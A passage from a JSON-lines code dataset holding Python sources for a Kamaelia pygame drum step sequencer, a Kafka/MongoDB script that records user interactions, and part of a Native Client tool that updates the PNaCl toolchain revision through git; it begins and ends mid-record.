"numpy.zeros_like", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 122, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt2d", "line_number": 139, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt2d", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 167, "usage_type": "call"}, {"api_name": "scipy.ndimage.label", "line_number": 168, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 168, "usage_type": "name"}, {"api_name": "scipy.ndimage.center_of_mass", "line_number": 170, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 170, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}]} +{"seq_id": "6372081275", "text": "import time\nimport pygame\nimport Axon\n\nfrom Axon.SchedulingComponent import SchedulingComponent\nfrom Kamaelia.UI.GraphicDisplay import PygameDisplay\n\nfrom Kamaelia.Apps.Jam.Util.MusicTiming import MusicTimingComponent\n\nclass StepSequencer(MusicTimingComponent):\n \"\"\"\n StepSequencer([numChannels, stepsPerBeat, position, messagePrefix,\n size]) -> new StepSequencer component\n\n A simple step sequencer for programming rhythmic patterns such as drum\n beats\n\n Keyword arguments (all optional):\n numChannels -- The number of channels in the step sequencer (default=4)\n stepsPerBeat -- The number of steps for each beat in the loop. Setting\n this to 2 for example will allow quavers to be played\n (default=1)\n position -- (x,y) position of top left corner in pixels\n messagePrefix -- string to be prepended to all messages\n size -- (w,h) in pixels (default=(500, 200))\n \"\"\"\n\n Inboxes = {\"inbox\" : \"Receive events from Pygame Display\",\n \"remoteChanges\" : \"Receive messages to alter the state of the XY pad\",\n \"event\" : \"Scheduled events\",\n \"sync\" : \"Timing synchronisation\",\n \"control\" : \"For shutdown messages\",\n \"callback\" : \"Receive callbacks from Pygame Display\",\n }\n \n Outboxes = {\"outbox\" : \"XY positions emitted here\",\n \"localChanges\" : \"Messages indicating change in the state of the XY pad emitted here\",\n \"signal\" : \"For shutdown messages\",\n \"display_signal\" : \"Outbox used for communicating to the display surface\"\n }\n \n numChannels = 4\n stepsPerBeat = 1\n position=None\n messagePrefix=\"\"\n size=(500, 200)\n\n def __init__(self, **argd):\n \"\"\"\n x.__init__(...) initializes x; see x.__class__.__doc__ for signature\n \"\"\"\n\n super(StepSequencer, self).__init__(**argd)\n\n # Channel init\n # ------------\n self.numSteps = self.beatsPerBar * self.loopBars * self.stepsPerBeat\n self.channels = []\n for i in range(self.numChannels):\n self.channels.append([])\n for j in range(self.numSteps):\n # Steps stored as [velocity, eventId] pairs\n self.channels[i].append([0, None])\n\n # UI Init\n # --------\n # Make the size fit the exact number of beats and channels\n self.size = (self.size[0] - self.size[0] % (self.numSteps) + 1,\n self.size[1] - self.size[1] % len(self.channels) + 2)\n self.positionSize = ((self.size[0]/self.numSteps), 25)\n self.stepSize = (self.size[0]/self.numSteps,\n (self.size[1]-self.positionSize[1])/len(self.channels))\n\n self.dispRequest = {\"DISPLAYREQUEST\" : True,\n \"callback\" : (self,\"callback\"), \n \"events\" : (self, \"inbox\"),\n \"size\": self.size,\n }\n\n if self.position:\n self.dispRequest[\"position\"] = self.position\n\n def addStep(self, step, channel, velocity, send=False):\n \"\"\"\n Turn a step on with a given velocity and add it to the scheduler. If\n the send argument is true then also send a message indicating the step\n has been activated to the \"localChanges\" outbox\n \"\"\"\n self.channels[channel][step][0] = velocity\n self.scheduleStep(step, channel)\n if send:\n self.send((self.messagePrefix + \"Add\", (step, channel, velocity)),\n \"localChanges\")\n\n def removeStep(self, step, channel, send=False):\n \"\"\"\n Turn a step off and remove it from the scheduler. If the send argument\n is true then also send a message indicating the step has been removed\n to the \"localChanges\" outbox\n \"\"\"\n self.channels[channel][step][0] = 0\n self.cancelStep(step, channel)\n if send:\n self.send((self.messagePrefix + \"Remove\", (step, channel)),\n \"localChanges\")\n\n def setVelocity(self, step, channel, velocity, send=False):\n \"\"\"\n Change the velocity of a step. If the send argument is true then also\n send a message indicating the velocity has changed to the\n \"localChanges\" outbox\n \"\"\"\n self.channels[channel][step][0] = velocity\n if send:\n self.send((self.messagePrefix + \"Velocity\",\n (step, channel, velocity)), \"localChanges\")\n\n ###\n # Timing Functions\n ###\n\n def startStep(self): # FIXME: Could maybe do with a better name?\n \"\"\"\n For use after any clock synchronising. Update the various timing\n variables, and schedule an initial step update.\n \"\"\"\n self.step = (self.loopBar * self.beatsPerBar + self.beat) * self.stepsPerBeat \n self.lastStepTime = self.lastBeatTime\n self.stepLength = self.beatLength / self.stepsPerBeat\n self.scheduleAbs(\"Step\", self.lastStepTime + self.stepLength, 2)\n \n\n def updateStep(self):\n \"\"\"\n Increment, and roll over if necessary, the step position counter, then\n update the position display.\n \"\"\"\n if self.step < self.numSteps - 1:\n self.step += 1\n else:\n self.step = 0\n self.lastStepTime += self.stepLength\n if self.step == 0:\n prevStep = self.numSteps - 1\n else:\n prevStep = self.step - 1\n self.drawPositionRect(self.step, True)\n self.drawPositionRect(prevStep, False)\n self.scheduleAbs(\"Step\", self.lastStepTime + self.stepLength, 2)\n\n def scheduleStep(self, step, channel):\n \"\"\"\n Schedule a step which has been just been activated\n \"\"\"\n # Easier if we define some stuff here\n beat = self.beat + (self.loopBar * self.beatsPerBar)\n currentStep = beat * self.stepsPerBeat\n loopStart = self.lastStepTime - (self.step * self.stepLength)\n loopLength = self.numSteps * self.stepLength\n\n stepTime = loopStart + (step * self.stepLength)\n if step <= currentStep:\n stepTime += loopLength\n event = self.scheduleAbs((\"StepActive\", step, channel), stepTime, 3)\n self.channels[channel][step][1] = event\n\n def rescheduleStep(self, step, channel):\n \"\"\"\n Reschedule a step to occur again in a loop's time\n \"\"\"\n stepTime = self.lastStepTime + self.numSteps * self.stepLength\n event = self.scheduleAbs((\"StepActive\", step, channel), stepTime, 3)\n self.channels[channel][step][1] = event\n\n def cancelStep(self, step, channel):\n \"\"\"\n Delete a step event from the scheduler\n \"\"\"\n self.cancelEvent(self.channels[channel][step][1])\n self.channels[channel][step][1] = None\n\n ###\n # UI Functions\n ###\n\n def drawMarkings(self):\n self.display.fill((255, 255, 255))\n pygame.draw.line(self.display, (0, 0, 0),\n (0, 0), (self.size[0], 0))\n for i in range(self.numChannels + 1):\n pygame.draw.line(self.display, (0, 0, 0),\n (0, self.positionSize[1] + i * self.stepSize[1]),\n (self.size[0], self.positionSize[1] + i * self.stepSize[1]))\n for i in range(self.numSteps + 1):\n if i % (self.stepsPerBeat * self.loopBars) == 0:\n # Dark lines\n colour = (0, 0, 0)\n elif i % (self.stepsPerBeat) == 0:\n # Lighter lines\n colour = (127, 127, 127)\n else:\n # Even lighter lines\n colour = (190, 190, 190)\n pygame.draw.line(self.display, colour,\n (i * self.stepSize[0], 0),\n (i * self.stepSize[0], self.size[1]))\n self.send({\"REDRAW\":True, \"surface\":self.display}, \"display_signal\")\n\n def drawStepRect(self, step, channel):\n \"\"\"\n Render a single step with a colour corresponding to its velocity\n \"\"\"\n position = (step * self.stepSize[0]+1, channel * self.stepSize[1] + self.positionSize[1] + 1)\n size = (self.stepSize[0] - 1, self.stepSize[1]-1)\n velocity = self.channels[channel][step][0]\n # Rectangle with different brightness reds\n pygame.draw.rect(self.display, (255, 255*(1-velocity),\n 255*(1-velocity)),\n pygame.Rect(position, size))\n\n def drawPositionRect(self, step, active):\n \"\"\"\n Render a single step in the position display, using colour if the\n position is active\n \"\"\"\n position = (step * self.stepSize[0]+1, 1)\n size = (self.positionSize[0] - 1, self.positionSize[1] - 1)\n if active:\n # Yellow\n colour = (255, 255, 0)\n else:\n colour = (255, 255, 255)\n pygame.draw.rect(self.display, colour,\n pygame.Rect(position, size))\n self.send({\"REDRAW\":True, \"surface\":self.display}, \"display_signal\")\n\n def positionToStep(self, position):\n \"\"\"\n Convert an (x, y) tuple from the mouse position to a (step, channel)\n tuple\n \"\"\"\n step = position[0]/self.stepSize[0]\n channel = (position[1]-self.positionSize[1])/self.stepSize[1]\n return step, channel\n\n def main(self):\n \"\"\"Main loop.\"\"\"\n displayService = PygameDisplay.getDisplayService()\n self.link((self,\"display_signal\"), displayService)\n\n self.send(self.dispRequest, \"display_signal\")\n\n # Wait until we get a display\n while not self.dataReady(\"callback\"):\n self.pause()\n self.display = self.recv(\"callback\")\n\n self.drawMarkings()\n\n self.send({\"ADDLISTENEVENT\" : pygame.MOUSEBUTTONDOWN,\n \"surface\" : self.display},\n \"display_signal\")\n\n self.send({\"ADDLISTENEVENT\" : pygame.MOUSEBUTTONUP,\n \"surface\" : self.display},\n \"display_signal\")\n\n # Timing init\n # In main because timingSync needs the scheduler to be working\n if self.sync:\n self.timingSync()\n else:\n self.lastBeatTime = time.time()\n self.startBeat()\n self.startStep()\n\n while 1:\n if self.dataReady(\"inbox\"):\n for event in self.recv(\"inbox\"):\n if event.type == pygame.MOUSEBUTTONDOWN:\n bounds = self.display.get_rect()\n # Don't respond to clicks in the position bar\n bounds.top += self.positionSize[1]\n bounds.height -= self.positionSize[1]\n # Don't respond to clicks on the bottom or right border\n bounds.width -= 1\n bounds.height -= 1\n if bounds.collidepoint(*event.pos):\n step, channel = self.positionToStep(event.pos)\n velocity = self.channels[channel][step][0]\n if event.button == 1:\n # Left click\n if velocity > 0:\n # Step off\n self.removeStep(step, channel, True) \n else:\n # Step on\n self.addStep(step, channel, 0.7, True)\n if event.button == 4:\n # Scroll up\n if velocity > 0 and velocity <= 0.95:\n velocity += 0.05\n self.setVelocity(step, channel, velocity,\n True)\n if event.button == 5:\n # Scroll down\n if velocity > 0.05:\n velocity -= 0.05\n self.setVelocity(step, channel, velocity,\n True)\n self.drawStepRect(step, channel)\n self.send({\"REDRAW\":True, \"surface\":self.display},\n \"display_signal\")\n\n if self.dataReady(\"remoteChanges\"):\n data = self.recv(\"remoteChanges\")\n # Only the last part of an OSC address\n address = data[0].split(\"/\")[-1]\n if address == \"Add\":\n self.addStep(*data[1])\n if address == \"Remove\":\n self.removeStep(*data[1])\n if address == \"Velocity\":\n self.setVelocity(*data[1])\n step, channel = data[1][0], data[1][1]\n self.drawStepRect(step, channel)\n\n if self.dataReady(\"event\"):\n data = self.recv(\"event\")\n if data == \"Beat\":\n self.updateBeat()\n elif data == \"Step\":\n self.updateStep()\n elif data[0] == \"StepActive\":\n message, step, channel = data\n velocity = self.channels[channel][step][0]\n self.send((self.messagePrefix + \"On\", (channel, velocity)),\n \"outbox\")\n self.rescheduleStep(step, channel)\n\n if self.dataReady(\"sync\"):\n # Ignore any sync messages once as we have already synced by\n # now\n self.recv(\"sync\")\n\n if not self.anyReady():\n self.pause()\n\nclass StepSequencerMidiConverter(Axon.Component.component):\n channel = 0\n # GM midi drum mapping for note numbers\n mapping = {3:36, # Bass drum\n 2:38, # Snare\n 1:42, # Closed HH\n 0:49} # Crash\n def main(self):\n while 1:\n if self.dataReady(\"inbox\"):\n note, velocity = self.recv(\"inbox\")[1]\n self.send((0x90 + self.channel, # Note on message with channel\n self.mapping[note], # Note number\n int(velocity*127)), # 7 bit velocity\n \"outbox\")\n if self.dataReady(\"control\"):\n msg = self.recv(\"control\")\n if (isinstance(msg, producerFinished) or\n isinstance(msg, shutdownMicroprocess)):\n self.send(msg, \"signal\")\n break\n if not self.anyReady():\n self.pause()\n yield 1\n\n\nif __name__ == \"__main__\":\n StepSequencer().run()\n\n #from Kamaelia.Chassis.Graphline import Graphline\n #Graphline(ss1 = StepSequencer(), ss2 = StepSequencer(position=(600, 0)),\n # linkages={(\"ss1\",\"localChanges\"):(\"ss2\", \"remoteChanges\")}).run()\n\n #from Kamaelia.Chassis.Pipeline import Pipeline\n #from Kamaelia.Apps.Jam.Protocol.Midi import Midi\n #Pipeline(StepSequencer(), StepSequencerMidiConverter(), Midi(0)).run()\n", "repo_name": "sparkslabs/kamaelia_", "sub_path": "Sketches/JT/Jam/library/trunk/Kamaelia/Apps/Jam/UI/StepSequencer.py", "file_name": "StepSequencer.py", "file_ext": "py", "file_size_in_byte": 15384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Kamaelia.Apps.Jam.Util.MusicTiming.MusicTimingComponent", "line_number": 10, "usage_type": "name"}, {"api_name": "pygame.draw.line", "line_number": 188, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 191, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 191, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 204, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 217, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 219, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 233, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 233, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 234, "usage_type": "call"}, {"api_name": "Kamaelia.UI.GraphicDisplay.PygameDisplay.getDisplayService", "line_number": 248, "usage_type": "call"}, {"api_name": "Kamaelia.UI.GraphicDisplay.PygameDisplay", "line_number": 248, "usage_type": "name"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 260, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 264, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 273, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 280, "usage_type": "attribute"}, {"api_name": "Axon.Component", "line_number": 349, "usage_type": "attribute"}]} +{"seq_id": "26867815347", "text": "'''\nAuthor: Thomas Theisen\n\nObjective: Aggregate interactions between users. Either post author to comment author or comment author to \n comment author. This information will be used to personalize responses/replies to maximize the \n propensity for a user to reply back. \n\n'''\n\n# Python Modules\n#-----------------------------------------------------------------------------#\nimport pickle\n\n# Interal Modules\n#-----------------------------------------------------------------------------#\nfrom kafka import KafkaProducer\nimport mongodb\nimport options\n\ndb = options.mongodb_database_healthcare\ncoll = options.mongodb_collection_healthcare\nproducer = KafkaProducer(bootstrap_servers = ['localhost:9092'])\n\nmongo = mongodb.MongoDB(db, coll, None)\n\ndef insertion(connections, postid, parent, child, child_author):\n\n if not bool(connections):\n current_postid = None\n else:\n current_postid = next(iter(connections)) \n\n if not bool(connections): \n print('New Post Incoming')\n post_author = mongo.return_post_author(postid)\n\n #Create pointer between id and author\n connections[postid] = {}\n connections[postid][parent] = post_author\n connections[postid][child] = child_author\n\n elif bool(connections) and current_postid == postid:\n print('Receiving Data from the same post')\n connections[postid][child] = child_author\n\n elif bool(connections) and current_postid != postid: #Moving onto next post\n print('Moving onto next post')\n deletion(connections, current_postid)\n post_author = mongo.return_post_author(postid)\n\n #Create pointer between id and author\n connections[postid] = {}\n connections[postid][parent] = post_author\n connections[postid][child] = child_author\n\n #Send interaction\n inner = connections[postid]\n parent_author = inner.get(parent)\n # print('sent postid: {}, parent_author: {}, child_author: {}'.format(postid, parent_author, child_author))\n send_associations(postid, parent_author, child_author)\n print('sent interaction')\n\n return connections\n\ndef send_associations(postid, author1, author2): #Send the users that interacted and on what post\n interaction = (postid, author1, author2)\n interaction_bytes = serialize(interaction)\n producer.send('associations', interaction_bytes)\n producer.flush()\n\ndef serialize(data):\n return pickle.dumps(data)\n \ndef deletion(connections, postid):\n return connections.pop(postid)\n\n", "repo_name": "TTheisen/textgen", "sub_path": "src/associations.py", "file_name": "associations.py", "file_ext": "py", "file_size_in_byte": 2536, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "options.mongodb_database_healthcare", "line_number": 20, "usage_type": "attribute"}, {"api_name": "options.mongodb_collection_healthcare", "line_number": 21, "usage_type": "attribute"}, {"api_name": "kafka.KafkaProducer", "line_number": 22, "usage_type": "call"}, {"api_name": "mongodb.MongoDB", "line_number": 24, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "13018797065", "text": "import argparse\nimport collections\nimport datetime\nimport email.mime.text\nimport getpass\nimport os\nimport re\nimport smtplib\nimport subprocess\nimport sys\nimport tempfile\n\ntry:\n from dateutil import parser as dateutilparser\nexcept:\n sys.stdout.write(\"Please `apt-get install python-dateutil`: \"\n \"Python's datetime packages don't handle timezones.\")\n raise\n\n\nBUILD_DIR = os.path.dirname(__file__)\nNACL_DIR = os.path.dirname(BUILD_DIR)\nTOOLCHAIN_REV_DIR = os.path.join(NACL_DIR, 'toolchain_revisions')\nPKG_VER = os.path.join(BUILD_DIR, 'package_version', 'package_version.py')\n\nDEFAULT_HASH='0000000000000000000000000000000000000000'\nPNACL_PACKAGE = 'pnacl_newlib'\n\n\ndef ParseArgs(args):\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"Update pnacl_newlib.json PNaCl version.\n\nLLVM and other projects are checked-in to the NaCl repository, but their head\nisn't necessarily the one that we currently use in PNaCl. The pnacl_newlib.json\nand pnacl_translator.json files point at git revisions to use for tools such as\nLLVM. Our build process then downloads pre-built tool tarballs from the\ntoolchain build waterfall.\n\ngit repository before running this script:\n ______________________\n | |\n v |\n ...----A------B------C------D------ NaCl HEAD\n ^ ^ ^ ^\n | | | |__ Latest pnacl_{newlib,translator}.json update.\n | | |\n | | |__ A newer LLVM change (LLVM repository HEAD).\n | |\n | |__ Oldest LLVM change since this PNaCl version.\n |\n |__ pnacl_{newlib,translator}.json points at an older LLVM change.\n\ngit repository after running this script:\n _______________\n | |\n v |\n ...----A------B------C------D------E------ NaCl HEAD\n\nNote that there could be any number of non-PNaCl changes between each of these\nchangelists, and that the user can also decide to update the pointer to B\ninstead of C.\n\nThere is further complication when toolchain builds are merged.\n\"\"\")\n parser.add_argument('--email', metavar='ADDRESS', type=str,\n default=getpass.getuser()+'@chromium.org',\n help=\"Email address to send errors to.\")\n parser.add_argument('--hash', metavar='HASH',\n help=\"Update to a specific git hash instead of the most \"\n \"recent git hash with a PNaCl change. This value must \"\n \"be more recent than the one in the current \"\n \"pnacl_newlib.json. This option is useful when multiple \"\n \"changelists' toolchain builds were merged, or when \"\n \"too many PNaCl changes would be pulled in at the \"\n \"same time.\")\n parser.add_argument('-n', '--dry-run', default=False, action='store_true',\n help=\"Print the changelist that would be sent, but \"\n \"don't actually send anything to review.\")\n parser.add_argument('--ignore-branch', default=False, action='store_true',\n help='Allow script to run from branches other than '\n 'master')\n # TODO(jfb) The following options come from download_toolchain.py and\n # should be shared in some way.\n parser.add_argument('--filter_out_predicates', default=[],\n help=\"Toolchains to filter out.\")\n return parser.parse_args()\n\n\ndef ExecCommand(command):\n try:\n return subprocess.check_output(command, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n sys.stderr.write('\\nRunning `%s` returned %i, got:\\n%s\\n' %\n (' '.join(e.cmd), e.returncode, e.output))\n raise\n\n\ndef GetCurrentRevision():\n return ExecCommand([sys.executable, PKG_VER,\n 'getrevision',\n '--revision-package', PNACL_PACKAGE]).strip()\n\n\ndef SetCurrentRevision(hash):\n ExecCommand([sys.executable, PKG_VER,\n 'setrevision',\n '--revision-set', PNACL_PACKAGE,\n '--revision', hash])\n\n\ndef GetRevisionPackageFiles():\n out = ExecCommand([sys.executable, PKG_VER,\n 'revpackages',\n '--revision-set', PNACL_PACKAGE])\n package_list = [package.strip() for package in out.strip().split('\\n')]\n return [os.path.join(TOOLCHAIN_REV_DIR, '%s.json' % package)\n for package in package_list]\n\n\ndef GitCurrentBranch():\n return ExecCommand(['git', 'symbolic-ref', 'HEAD', '--short']).strip()\n\n\ndef GitRevParse(rev):\n return ExecCommand(['git', 'rev-parse', rev]).strip()\n\n\ndef GitStatus():\n \"\"\"List of statuses, one per path, of paths in the current git branch.\n Ignores untracked paths.\"\"\"\n out = ExecCommand(['git', 'status', '--porcelain']).strip()\n if not out:\n return []\n out = out.split('\\n')\n return [f.strip() for f in out if not re.match('^\\?\\? (.*)$', f.strip())]\n\n\ndef SyncSources():\n ExecCommand(['gclient', 'sync'])\n\n\ndef GitCommitInfo(info='', obj=None, num=None, extra=[]):\n \"\"\"Commit information, where info is one of the shorthands in git_formats.\n obj can be a path or a hash.\n num is the number of results to return.\n extra is a list of optional extra arguments.\"\"\"\n # Shorthands for git's pretty formats.\n # See PRETTY FORMATS format: in `git help log`.\n git_formats = {\n '': '',\n 'hash': '%H',\n 'date': '%cI',\n 'author email': '%aE',\n 'subject': '%s',\n 'body': '%b',\n }\n cmd = ['git', 'log', '--format=format:%s' % git_formats[info]] + extra\n if num: cmd += ['-n'+str(num)]\n if obj: cmd += [obj]\n return ExecCommand(cmd).strip()\n\n\ndef GitCommitsSince(date):\n \"\"\"List of commit hashes since a particular date,\n in reverse chronological order.\"\"\"\n return GitCommitInfo(info='hash',\n extra=['--since=\"%s\"' % date]).split('\\n')\n\n\ndef GitFilesChanged(commit_hash):\n \"\"\"List of files changed in a commit.\"\"\"\n return GitCommitInfo(obj=commit_hash, num=1,\n extra=['--name-only']).split('\\n')\n\n\ndef GitChangesPath(commit_hash, path):\n \"\"\"Returns True if the commit changes a file under the given path.\"\"\"\n return any([\n re.search('^' + path, f.strip()) for f in\n GitFilesChanged(commit_hash)])\n\n\ndef GitBranchExists(name):\n return len(ExecCommand(['git', 'branch', '--list', name]).strip()) != 0\n\n\ndef GitCheckout(branch, force=False):\n \"\"\"Checkout an existing branch.\n force throws away local changes.\"\"\"\n ExecCommand(['git', 'checkout'] +\n (['--force'] if force else []) +\n [branch])\n\n\ndef GitCheckoutNewBranch(branch):\n \"\"\"Create and checkout a new git branch.\"\"\"\n ExecCommand(['git', 'checkout', '-b', branch, 'origin/master'])\n\n\ndef GitDeleteBranch(branch, force=False):\n \"\"\"Force-delete a branch.\"\"\"\n ExecCommand(['git', 'branch', '-D' if force else '-d', branch])\n\n\ndef GitAdd(file):\n ExecCommand(['git', 'add', file])\n\n\ndef GitCommit(message):\n with tempfile.NamedTemporaryFile() as tmp:\n tmp.write(message)\n tmp.flush()\n ExecCommand(['git', 'commit', '--file=%s' % tmp.name])\n\n\ndef UploadChanges():\n \"\"\"Upload changes, don't prompt.\"\"\"\n # TODO(jfb) Using the commit queue and avoiding git try + manual commit\n # would be much nicer. See '--use-commit-queue'\n return ExecCommand(['git', 'cl', 'upload', '--send-mail', '-f'])\n\n\ndef GitTry():\n return ExecCommand(['git', 'cl', 'try'])\n\n\ndef CommitMessageToCleanDict(commit_message):\n \"\"\"Extract and clean commit message fields that follow the NaCl commit\n message convention. Don't repeat them as-is, to avoid confusing our\n infrastructure.\"\"\"\n res = {}\n fields = [\n ['reviewers tbr', '\\s*TBR=([^\\n]+)', ''],\n ['reviewers', '\\s*R=([^\\n]+)', ''],\n ['review url', '\\s*Review URL: *([^\\n]+)', ''],\n ['bug', '\\s*BUG=([^\\n]+)', ''],\n ['test', '\\s*TEST=([^\\n]+)', ''],\n ]\n for key, regex, none in fields:\n found = re.search(regex, commit_message)\n if found:\n commit_message = commit_message.replace(found.group(0), '')\n res[key] = found.group(1).strip()\n else:\n res[key] = none\n res['body'] = commit_message.strip()\n return res\n\n\ndef SendEmail(user_email, out):\n if user_email:\n sys.stderr.write('\\nSending email to %s.\\n' % user_email)\n msg = email.mime.text.MIMEText(out)\n msg['Subject'] = '[PNaCl revision updater] failure!'\n msg['From'] = 'tool_revisions-bot@chromium.org'\n msg['To'] = user_email\n s = smtplib.SMTP('localhost')\n s.sendmail(msg['From'], [msg['To']], msg.as_string())\n s.quit()\n else:\n sys.stderr.write('\\nNo email address specified.')\n\n\ndef DryRun(out):\n sys.stdout.write(\"DRY RUN: \" + out + \"\\n\")\n\n\ndef Done(out):\n sys.stdout.write(out)\n sys.exit(0)\n\n\nclass CLInfo:\n \"\"\"Changelist information: sorted dictionary of NaCl-standard fields.\"\"\"\n def __init__(self, desc):\n self._desc = desc\n self._vals = collections.OrderedDict([\n ('hash', None),\n ('author email', None),\n ('date', None),\n ('subject', None),\n ('commits since', None),\n ('bug', None),\n ('test', None),\n ('review url', None),\n ('reviewers tbr', None),\n ('reviewers', None),\n ('body', None),\n ])\n def __getitem__(self, key):\n return self._vals[key]\n def __setitem__(self, key, val):\n assert key in self._vals.keys()\n self._vals[key] = str(val)\n def __str__(self):\n \"\"\"Changelist to string.\n\n A short description of the change, e.g.:\n 1c0ffee: (tom@example.com) Subject of the change.\n\n If the change is itself pulling in other changes from\n sub-repositories then take its relevant description and append it to\n the string. These sub-directory updates are also script-generated\n and therefore have a predictable format. e.g.:\n 1c0ff33: (tom@example.com) Subject of the change.\n | dead123: (dick@example.com) Other change in another repository.\n | beef456: (harry@example.com) Yet another cross-repository change.\n \"\"\"\n desc = (' ' + self._vals['hash'][:7] + ': (' +\n self._vals['author email'] + ') ' +\n self._vals['subject'])\n if GitChangesPath(self._vals['hash'], 'pnacl/COMPONENT_REVISIONS'):\n git_hash_abbrev = '[0-9a-fA-F]{7}'\n email = '[^@)]+@[^)]+\\.[^)]+'\n desc = '\\n'.join([desc] + [\n ' | ' + line for line in self._vals['body'].split('\\n') if\n re.match('^ *%s: \\(%s\\) .*$' % (git_hash_abbrev, email), line)])\n return desc\n\n\ndef FmtOut(tr_points_at, pnacl_changes, new_git_hash, err=[], msg=[]):\n assert isinstance(err, list)\n assert isinstance(msg, list)\n old_git_hash = tr_points_at['hash']\n changes = '\\n'.join([str(cl) for cl in pnacl_changes])\n bugs = '\\n'.join(sorted(list(set(\n ['BUG= ' + cl['bug'].strip() if cl['bug'] else '' for\n cl in pnacl_changes]) - set(['']))))\n reviewers = ', '.join(sorted(list(set(\n [r if '@' in r else r + '@chromium.org' for r in\n [r.strip() for r in\n (','.join([\n cl['author email'] + ',' +\n cl['reviewers tbr'] + ',' +\n cl['reviewers']\n for cl in pnacl_changes])).split(',')]\n if r != '']))))\n return (('*** ERROR ***\\n' if err else '') +\n '\\n\\n'.join(err) +\n '\\n\\n'.join(msg) +\n ('\\n\\n' if err or msg else '') +\n ('Update revision for PNaCl\\n\\n'\n 'Update %s -> %s\\n\\n'\n 'Pull the following PNaCl changes into NaCl:\\n%s\\n\\n'\n '%s\\n'\n 'R= %s\\n'\n 'TEST=git cl try\\n'\n '(Please LGTM this change and tick the \"commit\" box)\\n' %\n (old_git_hash, new_git_hash, changes, bugs, reviewers)))\n\n\ndef Main(args):\n args = ParseArgs(args)\n\n new_pnacl_revision = args.hash\n user_provided_hash = args.hash is not None\n if user_provided_hash:\n new_pnacl_revision = GitRevParse(new_pnacl_revision)\n\n tr_points_at = CLInfo('revision update points at PNaCl version')\n pnacl_changes = []\n msg = []\n\n orig_branch = GitCurrentBranch()\n if not args.dry_run and not args.ignore_branch:\n if orig_branch != 'master':\n raise Exception('Must be on branch master, currently on %s' % orig_branch)\n\n if not args.dry_run:\n status = GitStatus()\n if len(status) != 0:\n raise Exception(\"Repository isn't clean:\\n %s\" % '\\n '.join(status))\n\n try:\n if not args.dry_run:\n SyncSources()\n\n # The current revision file points at a specific PNaCl LLVM version. LLVM is\n # checked-in to the NaCl repository, but its head isn't necessarily the one\n # that we currently use in PNaCl.\n tr_points_at['hash'] = GetCurrentRevision()\n tr_points_at['date'] = GitCommitInfo(\n info='date', obj=tr_points_at['hash'], num=1)\n recent_commits = GitCommitsSince(tr_points_at['date'])\n tr_points_at['commits since'] = len(recent_commits)\n assert len(recent_commits) > 1\n\n if not user_provided_hash:\n # No update hash specified, take the latest commit.\n new_pnacl_revision = recent_commits[0]\n else:\n new_pnacl_revision_date = GitCommitInfo(\n info='date', obj=new_pnacl_revision, num=1)\n new_date = dateutilparser.parse(new_pnacl_revision_date)\n old_date = dateutilparser.parse(tr_points_at['date'])\n if new_date <= old_date:\n Done(FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision,\n err=[\"Can't update to git hash %s committed on %s: \"\n \"the current PNaCl revision's current hash %s \"\n \"committed on %s is more recent.\" %\n (new_pnacl_revision, new_pnacl_revision_date,\n tr_points_at['hash'], tr_points_at['date'])]))\n\n # Find the commits changing PNaCl files that follow the previous PNaCl\n # revision pointer.\n pnacl_pathes = ['pnacl/', 'toolchain_build/']\n pnacl_hashes = list(set(reduce(\n lambda acc, lst: acc + lst,\n [[cl for cl in recent_commits[:-1] if\n GitChangesPath(cl, path)] for\n path in pnacl_pathes])))\n for hash in pnacl_hashes:\n cl = CLInfo('PNaCl change ' + hash)\n cl['hash'] = hash\n for i in ['author email', 'date', 'subject']:\n cl[i] = GitCommitInfo(info=i, obj=hash, num=1)\n for k,v in CommitMessageToCleanDict(\n GitCommitInfo(info='body', obj=hash, num=1)).iteritems():\n cl[k] = v\n pnacl_changes.append(cl)\n\n # Hashes aren't ordered chronologically, make sure the changes are.\n pnacl_changes.sort(key=lambda x: dateutilparser.parse(x['date']))\n\n # Remove commits later than the current commit or the user-provided one.\n cutoff_date = dateutilparser.parse(GitCommitInfo(\n info='date', obj=new_pnacl_revision, num=1))\n pnacl_changes = [cl for cl in pnacl_changes if\n dateutilparser.parse(cl['date']) <= cutoff_date]\n\n if len(pnacl_changes) == 0:\n Done(FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision,\n msg=['No PNaCl change since %s on %s.' %\n 